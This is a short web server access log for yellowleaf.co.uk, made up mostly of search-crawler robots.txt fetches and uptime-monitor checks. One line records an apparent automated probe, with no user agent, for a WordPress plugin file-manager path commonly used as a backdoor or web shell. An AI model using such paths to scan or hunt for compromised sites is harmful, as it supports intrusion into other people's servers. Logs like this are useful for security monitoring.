85.208.98.23 - - [27/Jul/2025:20:08:12 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [27/Jul/2025:20:08:12 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
69.162.124.235 - - [27/Jul/2025:20:09:08 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
85.208.98.23 - - [27/Jul/2025:20:09:46 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [27/Jul/2025:20:11:53 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
130.33.60.33 - - [27/Jul/2025:20:13:06 +0000] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 301 281 "-" "-"
85.208.98.23 - - [27/Jul/2025:20:13:37 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [27/Jul/2025:20:13:38 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [27/Jul/2025:20:13:47 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
216.144.248.25 - - [27/Jul/2025:20:14:12 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
85.208.98.23 - - [27/Jul/2025:20:15:58 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
216.73.216.90 - - [27/Jul/2025:20:17:25 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
85.208.98.23 - - [27/Jul/2025:20:19:06 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
216.144.248.23 - - [27/Jul/2025:20:19:17 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
85.208.98.23 - - [27/Jul/2025:20:23:50 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
216.144.248.24 - - [27/Jul/2025:20:24:21 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
85.208.98.23 - - [27/Jul/2025:20:25:22 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [27/Jul/2025:20:25:22 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
